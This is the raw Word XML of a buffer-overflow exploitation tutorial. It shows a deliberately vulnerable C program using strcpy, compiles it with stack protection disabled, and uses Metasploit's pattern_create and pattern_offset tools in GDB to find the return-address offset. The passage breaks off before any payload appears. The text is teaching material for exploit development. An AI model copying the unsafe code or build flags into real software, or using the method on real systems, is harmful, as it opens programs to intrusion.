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8A706" w14:textId="6E9E9C86" w:rsidR="00CF1992" w:rsidRDefault="00B2677C" w:rsidP="00B2677C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B2677C">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Using</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B2677C">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B2677C">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B2677C">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Framework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B2677C">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>and PEDA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E7BD22" w14:textId="06DF45F2" w:rsidR="00B2677C" w:rsidRDefault="00B2677C" w:rsidP="00B2677C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B2677C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>First, we will use the Metasploit Framework to create the pattern, and to do so we need to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B2677C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>navigate to this location: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B2677C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B2677C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B2677C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B2677C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-framework/tools/exploit/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8B08D7" w14:textId="1A5A2177" w:rsidR="00B2677C" w:rsidRDefault="00842A44" w:rsidP="00B2677C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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Let's take an example using our vulnerable code but with a bigger buffer, let's say 256:</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stdlib.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>copytobuffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(char* input)</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>char buffer[256];</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44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842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buffer,input</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>return 0;</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>} v</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>oid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> main (int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>argc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, char *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[])</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>local_variable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 1;</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>copytobuffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[1]);</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>exit(0);</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC28D34" w14:textId="03195637" w:rsidR="00842A44" w:rsidRDefault="00842A44" w:rsidP="00B2677C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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Now, let's compile it:</w:t>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ 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gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -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fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-stack-protector -z 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execstack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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buffer.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0D3EAA" w14:textId="5D29F2EC" w:rsidR="00842A44" w:rsidRDefault="00842A44" w:rsidP="00B2677C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D593F8C" w14:textId="52452879" w:rsidR="00842A44" w:rsidRDefault="00842A44" w:rsidP="00B2677C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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Then we will use GDB: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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00842A44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buffe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="422E79C1" w14:textId="0F06FD12" w:rsidR="00842A44" w:rsidRDefault="00842A44" w:rsidP="00B2677C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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Next, we calculate the offset of the RIP location. So, first let's create a pattern by using the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Metasploit Framework on our attacking machine and inside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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>metasploitframework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/tools/exploit/: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42A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00842A44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pattern_create.rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l 300 &gt; pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A27431B" w14:textId="4DCA9E41" w:rsidR="00842A44" w:rsidRDefault="00842A44" w:rsidP="00B2677C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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In the previous command, we generated a pattern with a length of 300 and saved it in a file with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the name pattern. Now copy this file to our victim machine and use this pattern as input inside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GDB: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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ run $(cat pattern)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E3525B" w14:textId="08C6D35D" w:rsidR="00842A44" w:rsidRDefault="00842A44" w:rsidP="00B2677C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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Let's take a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look at how the x command works in GDB, using help x:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584FD652" w14:textId="4EA75340" w:rsidR="00842A44" w:rsidRDefault="00842A44" w:rsidP="00B2677C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4D83872" wp14:editId="70CD230E">
            <wp:extent cx="5400040" cy="23596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AE7F" w14:textId="753E516A" w:rsidR="00842A44" w:rsidRDefault="00842A44" w:rsidP="00B2677C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C6575A" w14:textId="30760B10" w:rsidR="00842A44" w:rsidRDefault="00842A44" w:rsidP="00B2677C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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lastRenderedPageBreak/>
        <w:t>Now, let's print the last element inside the stack using x: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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ x/x $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rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B9334D6" w14:textId="32A1BCD5" w:rsidR="00842A44" w:rsidRDefault="00842A44" w:rsidP="00B2677C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976C225" wp14:editId="1C02CDE6">
            <wp:extent cx="2362200" cy="809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0DC6" w14:textId="00E9E50F" w:rsidR="00842A44" w:rsidRDefault="00842A44" w:rsidP="00B2677C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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The last element in the stack is ;0x41386941. You can also use x/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to print a full word from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inside the RSP register. Now we need to calculate the exact location of the RIP register using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842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pattern_offset.rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on our attacking machine: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842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pattern_offset.rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00842A44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -q 0x41386941 -l 300</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280518B0" w14:textId="35888FA4" w:rsidR="00842A44" w:rsidRDefault="00842A44" w:rsidP="00B2677C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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First, we specified the query we extracted from the stack; then we specified the length of the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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pattern we used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FB510E" w14:textId="75965292" w:rsidR="00842A44" w:rsidRDefault="00842A44" w:rsidP="00B2677C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="083E83BF" wp14:editId="6150D8B4">
            <wp:extent cx="3648075" cy="88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9B6F" w14:textId="6CFE8B74" w:rsidR="00842A44" w:rsidRDefault="00842A44" w:rsidP="00B2677C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
